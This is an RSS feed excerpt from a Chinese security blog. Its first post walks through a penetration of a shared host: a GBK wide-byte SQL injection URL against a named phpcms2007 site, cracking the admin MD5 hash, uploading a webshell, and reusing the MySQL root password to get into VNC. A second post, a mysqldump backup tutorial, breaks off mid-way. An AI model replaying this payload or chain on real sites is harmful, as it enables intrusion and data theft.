<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>神刀网</title><link>http://www.nhs8.com/</link><description>简者为王 技术为先 开源创意 {Q:46007728 无事广告别加！}开启RSS的全文输出，欢迎订阅！</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 91204</generator><language>zh-CN</language><copyright>Copyright http://www.nhs8.com 神刀网 Some Rights Reserved.粤ICP备06083217号</copyright><pubDate>Mon, 25 Jan 2010 02:41:18 +0800</pubDate><item><title>一次简单的“旁注”渗透</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1098.html</link><pubDate>Sun, 24 Jan 2010 16:40:58 +0800</pubDate><guid>http://www.nhs8.com/post/1098.html</guid><description><![CDATA[<p>来源：<font face="宋体">饭&rsquo;S 博客</font></p><p>渗透的主机是一朋友的，双线架设的虚拟主机，里面有几个站，架构是apache+php+mysql。在测试前，信息收集是很重要的。从系统信息、数据库信息、网络设备信息、管理员的信息等，都是值的统计分析和利用的。先对主机来端口扫描：</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241641200684.jpg" width="575" onload="javascript:contentimage(this);" alt="" /></p><p>由图可知：这台服务器开放了80、443、5901等端口，开放了WEB、https、VNC等端口。由于是虚拟主机，确认其有多少个域名和网站，是旁注的第一步。使用虚拟主机站点查询工具，进行查询：</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241641240028.jpg" width="495" onload="javascript:contentimage(this);" alt="" /></p><p>由上图可知，此IP上共有七个站点。随便浏览了这七个站点，其中有个站好像有问题。如下图：</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241641243285.jpg" width="632" onload="javascript:contentimage(this);" alt="" /></p><p>很眼熟的phpcms标志。既然有主站在使用开源的CMS，值得&rdquo;深入&rdquo;。拿出wwwscan工具进行进一步扫描。</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241641278608.jpg" width="549" onload="javascript:contentimage(this);" alt="" /></p><p>扫描结束后，告诉了几个目录，一一访问，寻找有没有敏感信息。</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241641280434.jpg" width="703" onload="javascript:contentimage(this);" alt="" /></p><p>一个管理员界面，说明phpcms是2007版的。从分析结果来看，其一网站使用了phpcms2007版的程序，在Web应用程序渗透测试，注入是很常见的手法了。记得有个很经典的多字节编码漏洞。其漏洞引发的原理是：0xbf27不是有一个有效的GBK字符，但是经过addslashed()转换后就变成0xbf5c27,0xbf5c是个有效的GBK字符，所以0xbf5c27会当作一个字符0xbf5c和一个单绰号来处理，结果是跟在引号后查询语句得到了执行。在phpcms2007程序里由多字节编码漏洞引发的漏洞有多个，以area.php文件里的漏洞来作测试。 <br />提交URL：<a href="http://www.nhs8.com/upload/201001241641287410.jpg" width="504" onload="javascript:contentimage(this);" alt="" /></p><p>很经典的一个多字节编码漏洞的网页。继续提交来判断列数： <br /><a href="http://www.nhs8.com/upload/201001241641326246.jpg" width="380" onload="javascript:contentimage(this);" alt="" /></p><p>由上图可知，返回正常网页。继续提交URL： <br /><a href="http://www.nhs8.com/upload/201001241641354164.jpg" width="415" onload="javascript:contentimage(this);" alt="" /></p><p>返回不正常网页。 <br />说明列数值是1，继续提交： <br /><a href="http://www.nuanyue.com/area.php?action=city&amp;province=&iquest;'/**/union/**/select/**/user()/">http://www.nuanyue.com/area.php?action=city&amp;province=%BF%27/**/union/**/select/**/user()/</a>**</p><p><img onmousewheel="return cgimg(this);" src="http://hacknote.com/uploadfile/2010-01-19/hacknote.com085858833.jpg" width="381" onload="javascript:contentimage(this);" alt="" /></p><p>看来网站连接数据库的权限很大。还可以通过version(),data()..等收集信息。直接暴露phpcmd后台的管理员和密码。利用后台可以上传编辑php文件获取WebShell。继续提交： <br /><a href="http://www.nhs8.com/upload/201001241641592687.jpg" width="419" onload="javascript:contentimage(this);" alt="" /></p><p>由上图可以知道，网站的管理员是phpcms，而密码是32MD加密的。可以直接去md5相关网站去查询如图：</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241642025885.jpg" width="593" onload="javascript:contentimage(this);" alt="" /></p><p>已经知道管理后台帐号和密码了。直接进后台去上传脚本木马了。由于phpcms程序在后台上传php脚本没有限制，所以得到后台，就可以上传脚本木马。</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241642034762.jpg" width="609" onload="javascript:contentimage(this);" alt="" /></p><p>其次渗透测试利用的方法主要是旁注，旁注的意义在于&rdquo;曲径通幽&rdquo;，进而获取系统权限。在此之前，收集数据库信息、系统信息、网站信息和系统管理员的信息进行综合分析利用，在社工是有意义的。在获取一网站的权限，我们进行分析。</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241642046723.jpg" width="554" onload="javascript:contentimage(this);" alt="" /></p><p>获取系统的mysql的管理员帐号是root,密码是12*。许多管理员有密码系统多用的情况，来试试vnc是不是也用这个密码？</p><p><img onmousewheel="return cgimg(this);" src="http://www.nhs8.com/upload/201001241642055041.jpg" width="617" onload="javascript:contentimage(this);" alt="" /></p><p>直接进去了，获取root权限，连用exp来提权都省了。&rdquo;三分技术，七分管理&rdquo;，很好的验证，一个密码多用或者密码有规律的都是存在风险的。</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1098.html" target="_blank">继续阅读《一次简单的“旁注”渗透》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1098.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p><p><a  href="http://www.nhs8.com/post/1083.html">CMD下建立VPN</a>&nbsp;&nbsp;(2010-1-23 21:9:2)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1098.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1098</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1098&amp;key=4a6ffab5</trackback:ping></item><item><title>MySQL数据库备份的基础知识大全</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1097.html</link><pubDate>Sun, 24 Jan 2010 16:37:00 +0800</pubDate><guid>http://www.nhs8.com/post/1097.html</guid><description><![CDATA[<p><table class="tab-content table-break" cellspacing="0" cellpadding="0">    <tbody>        <tr>            <td class="summary remark word-break">            <div class="summary remark word-break" id="div-view-summary">MySQL数据库备份的基础知识大全</div>            </td>        </tr>        <tr>            <td class="remark word-break">            <div class="remark word-break" id="div-view-remark">            <p>            <p>&nbsp;</p>            </p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">平时我们在使用MySQL数据库的时候经常会因为操作失误造成数据丢失，MySQL数据库备份可以帮助我们避免由于各种原因造成的数据丢失或着数据库的其他问题。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>一、数据备份捷径</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">因为这个方法没有得到官方正式文档的验证，我们暂称为试验吧。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">目的：备份hostA主机中一个MySQL数据库备份TestA，并恢复到到hostB机中</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>试验环境：</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>操作系统：</strong>WinNT4.0,Mysql3.22.34,phpMyAdmin 2.1.0</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">在hostA中安装MySQL数据库备份并建立TestA数据库</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">hostB机安装MySQL数据库备份，没有TestA数据库</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>方法步骤：</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">启动phpMyAdmin察看HostA和HostB中的数据库列表，在HostB中没有TestA数据库</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">找到HostA中MySQL数据库备份的安装目录，并找到数据库目录data</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">在我的试验环境中，这个目录是<strong>C:\mysql\data</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">找到对应数据库名称的子目录<strong>C:\mysql\data\TestA</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">粘贴拷贝到HostB的Data目录下，是HostA同HostB MySQL数据库备份数据目录下的文件相同</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">刷新HostB的phpMyAdmin察看一下数据库列表，我们看到TestA已经出现，并且作查询修改等操作都正常，备份恢复恢复成功</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">试验结论：MySQL的数据库可以通过文件形式保存，备份，恢复只要将相应文件目录恢复即可，无需使用其它工具备份。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">            <p>&nbsp;</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><br class="Apple-interchange-newline" />            <span class="Apple-style-span" style="word-spacing: 0px; font: medium 'Times New Roman'; text-transform: none; color: rgb(0,0,0); text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; orphans: 2; widows: 2"><span class="Apple-style-span" style="font-size: 14px; color: rgb(42,42,42); line-height: 25px; font-family: Tahoma,Helvetica,Arial,sans-serif; text-align: left">            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">为开始导出锁定所有表。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-t, --no-create-info</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">不写入表创建信息(CREATE TABLE语句)</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-d, --no-data</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">不写入表的任何行信息。如果你只想得到一个表的结构的导出，这是很有用的!</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--opt</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">同：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--quick --add-drop-table --add-locks --extended-insert --lock-tables</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">应该给你为读入一个MySQL数据库备份服务器的尽可能最快的导出。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-pyour_pass, --password[=your_pass]</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">与服务器连接时使用的口令。如果你不指定&ldquo;=your_pass&rdquo;部分，mysqldump需要来自终端的口令。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-P port_num, --port=port_num</td>                    </tr>                </tbody>            </table>            </span></span><span class="Apple-style-span" style="word-spacing: 0px; font: medium 'Times New Roman'; text-transform: none; color: rgb(0,0,0); text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; orphans: 2; widows: 2"><span class="Apple-style-span" style="font-size: 14px; color: rgb(42,42,42); line-height: 25px; font-family: Tahoma,Helvetica,Arial,sans-serif; text-align: left">            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">与一台主机连接时使用的TCP/IP端口号。(这用于连接到localhost以外的主机，因为它使用 Unix套接字。)</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-q, --quick</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">不缓冲查询，直接导出至stdout;使用MySQL_use_result()做它。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-S /path/to/socket, --socket=/path/to/socket</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">与localhost连接时(它是缺省主机)使用的套接字文件。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-T, --tab=path-to-some-directory</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">对于每个给定的表，创建一个table_name.sql文件，它包含SQL CREATE 命令，和一个table_name.txt文件，它包含数据。 注意：这只有在mysqldump运行在mysqld守护进程运行的同一台机器上的时候才工作。.txt文件的格式根据--fields-xxx和--lines--xxx选项来定。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-u user_name, --user=user_name</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">与服务器连接时，MySQL使用的用户名。缺省值是你的Unix登录名。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-O var=option, --set-variable var=option</td>                    </tr>                </tbody>            </table>            </span></span><span class="Apple-style-span" style="word-spacing: 0px; font: medium 'Times New Roman'; text-transform: none; color: rgb(0,0,0); text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; orphans: 2; widows: 2"><span class="Apple-style-span" style="font-size: 14px; color: rgb(42,42,42); line-height: 25px; font-family: Tahoma,Helvetica,Arial,sans-serif; text-align: left">            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">设置一个变量的值。可能的变量被列在下面。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-v, --verbose</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">冗长模式。打印出程序所做的更多的信息。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-V, --version</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">打印版本信息并且退出。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-w, --where='where-condition'</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">只导出被选择了的记录;注意引号是强制的!</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">&quot;--where=user='jimf'&quot; &quot;-wuserid&gt;1&quot; &quot;-wuserid1&quot;</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">最常见的mysqldump使用可能制作整个数据库的一个备份：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">mysqldump --opt database &gt; backup-file.sql</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">但是它对用来自于一个数据库的信息充实另外一个MySQL数据库备份也是有用的：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 